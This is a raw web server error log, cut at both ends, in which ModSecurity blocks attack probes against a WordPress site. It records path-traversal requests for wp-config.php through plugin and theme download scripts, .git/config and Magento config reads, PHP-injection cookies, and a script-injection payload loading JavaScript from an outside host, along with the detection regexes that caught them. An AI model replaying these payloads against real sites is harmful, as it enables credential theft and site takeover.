2024] [:error] [pid 8437:tid 140325657970432] [client 82.102.26.62:33868] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/antioch/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/antioch/lib/scripts/download.php"] [unique_id "ZkeqvQHRq32rr8s-kdzlGAAAAMY"] [Fri May 17 14:06:37.829848 2024] [:error] [pid 8437:tid 140325431469824] [client 82.102.26.62:33870] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/uploads/sb-download.php?file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/sb-download.php"] [unique_id "ZkeqvQHRq32rr8s-kdzlGQAAANg"] [Fri May 17 14:06:38.811388 2024] [:error] [pid 8308:tid 140325691541248] [client 82.102.26.62:33874] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/apptha-slider-gallery/asgallDownload.php?imgname=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/apptha-slider-gallery/asgallDownload.php"] [unique_id "ZkeqviiHs15nDF7H6GoAkgAAAII"] [Fri May 17 14:06:41.409629 2024] [:error] [pid 8308:tid 140325448255232] [client 82.102.26.62:33882] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZkeqwSiHs15nDF7H6GoAkwAAAJY"] [Fri May 17 14:06:42.494691 2024] [:error] [pid 8307:tid 140325557360384] [client 82.102.26.62:33886] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php"] [unique_id "ZkeqwhnTegMEbUYrnyHPxwAAAEk"] [Fri May 17 14:06:42.635102 2024] [:error] [pid 8307:tid 140325548967680] [client 82.102.26.62:33888] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/urbancity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/urbancity/lib/scripts/download.php"] [unique_id "ZkeqwhnTegMEbUYrnyHPyAAAAEo"] [Fri May 17 14:06:42.773005 2024] [:error] [pid 8307:tid 140325532182272] [client 82.102.26.62:33890] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/linenity/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/linenity/functions/download.php"] [unique_id "ZkeqwhnTegMEbUYrnyHPyQAAAEw"] [Fri May 17 14:06:42.914644 2024] [:error] [pid 8307:tid 140325507004160] [client 82.102.26.62:33892] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/duena/download.php?f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/duena/download.php"] [unique_id "ZkeqwhnTegMEbUYrnyHPygAAAE8"] [Fri May 17 14:06:43.050890 2024] [:error] [pid 8307:tid 140325481826048] [client 82.102.26.62:33894] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/PlixPro/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/PlixPro/download.php"] [unique_id "ZkeqwxnTegMEbUYrnyHPywAAAFI"] [Fri May 17 14:06:43.189219 2024] [:error] [pid 8308:tid 140325523789568] [client 82.102.26.62:33896] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.ini"] [unique_id "ZkeqwyiHs15nDF7H6GoAlAAAAI0"] [Fri May 17 14:06:43.329394 2024] [:error] [pid 8437:tid 140325532182272] [client 82.102.26.62:33898] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php"] [unique_id "ZkeqwwHRq32rr8s-kdzlHAAAAMw"] [Sat May 18 03:20:19.224953 2024] [ssl:warn] [pid 24600:tid 139967462381440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 18 03:20:27.440389 2024] [ssl:warn] [pid 24603:tid 139967462381440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 18 03:20:27.975523 2024] [ssl:warn] [pid 24603:tid 139967462381440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 18 03:20:30.085076 2024] [ssl:warn] [pid 24603:tid 139967462381440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 18 03:20:32.406308 2024] [ssl:warn] [pid 25024:tid 140071179745152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 18 03:20:40.612918 2024] [ssl:warn] [pid 25031:tid 140071179745152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 18 18:20:59.980958 2024] [autoindex:error] [pid 25680:tid 140070854043392] [client 41.216.188.18:39996] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 18 18:21:23.057834 2024] [autoindex:error] [pid 25680:tid 140070795294464] [client 41.216.188.18:40006] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 18 18:21:28.590048 2024] [autoindex:error] [pid 25055:tid 140070996997888] [client 41.216.188.18:40008] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/05/18 18:21:53 [error] 24911#24911: *538987 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 41.216.188.18, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" 2024/05/18 18:21:59 [error] 24911#24911: *538988 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 41.216.188.18, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" [Sat May 18 18:22:04.363400 2024] [autoindex:error] [pid 25680:tid 140070728152832] [client 41.216.188.18:40014] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 18 18:22:24.985693 2024] [autoindex:error] [pid 25055:tid 140070971819776] [client 41.216.188.18:40028] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 18 18:22:30.669016 2024] [autoindex:error] [pid 25055:tid 140070744938240] [client 41.216.188.18:40030] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 18 18:22:38.095696 2024] [autoindex:error] [pid 25055:tid 140070753330944] [client 41.216.188.18:40032] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 18 18:22:44.073718 2024] [autoindex:error] [pid 25055:tid 140070845650688] [client 41.216.188.18:40034] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 18 18:22:50.139176 2024] [autoindex:error] [pid 25055:tid 140070887614208] [client 41.216.188.18:40038] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 18 18:22:54.608661 2024] [autoindex:error] [pid 25055:tid 140070988605184] [client 41.216.188.18:40040] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 18 18:23:01.336961 2024] [autoindex:error] [pid 25055:tid 140070820472576] [client 41.216.188.18:40042] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun May 19 03:48:25.835303 2024] [ssl:warn] [pid 17173:tid 139818027595648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 19 03:48:39.136408 2024] [ssl:warn] [pid 17183:tid 139818027595648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 19 03:48:39.552564 2024] [ssl:warn] [pid 17183:tid 139818027595648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 19 03:48:41.135384 2024] [ssl:warn] [pid 17183:tid 139818027595648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 19 03:48:43.435767 2024] [ssl:warn] [pid 17634:tid 140378218907520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 19 03:48:51.680712 2024] [ssl:warn] [pid 17641:tid 140378218907520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 19 05:57:33.914917 2024] [autoindex:error] [pid 17662:tid 140377759598336] [client 4.242.221.96:51894] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun May 19 15:14:24.166582 2024] [:error] [pid 22327:tid 140378036160256] [client 178.159.37.38:34166] [client 178.159.37.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZkpdoGVzrFJec2j4ODYwqAAAAQA"], referer: www.google.com [Sun May 19 15:14:28.377909 2024] [:error] [pid 22327:tid 140377759598336] [client 178.159.37.38:34168] [client 178.159.37.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZkpdpGVzrFJec2j4ODYwqQAAARg"], referer: www.google.com [Mon May 20 03:20:24.711397 2024] [ssl:warn] [pid 7367:tid 139977847625600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 20 03:20:36.945069 2024] [ssl:warn] [pid 7370:tid 139977847625600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 20 03:20:37.203262 2024] [ssl:warn] [pid 7370:tid 139977847625600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 20 03:20:38.901428 2024] [ssl:warn] [pid 7370:tid 139977847625600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 20 03:20:41.176527 2024] [ssl:warn] [pid 7785:tid 140674799851392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 20 03:20:49.406421 2024] [ssl:warn] [pid 7787:tid 140674799851392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/05/20 08:01:36 [error] 7767#7767: *558987 access forbidden by rule, client: 81.17.29.130, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/05/20 09:34:02 [error] 7766#7766: *561055 access forbidden by rule, client: 81.17.29.130, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/20 10:13:09 [error] 7767#7767: *561841 access forbidden by rule, client: 81.17.29.130, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon May 20 13:53:52.768223 2024] [:error] [pid 8515:tid 140674372384512] [client 179.43.191.18:57438] [client 179.43.191.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZkucQLjIZaSoo3xuGrHN7wAAANU"], referer: http://investigacionperu.com [Tue May 21 01:57:40.956881 2024] [:error] [pid 8515:tid 140674439526144] [client 213.142.159.168:45678] [client 213.142.159.168] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi-importer/web/download_file.php"] [unique_id "ZkxF5LjIZaSoo3xuGrHVKQAAAM0"] [Tue May 21 01:57:41.354152 2024] 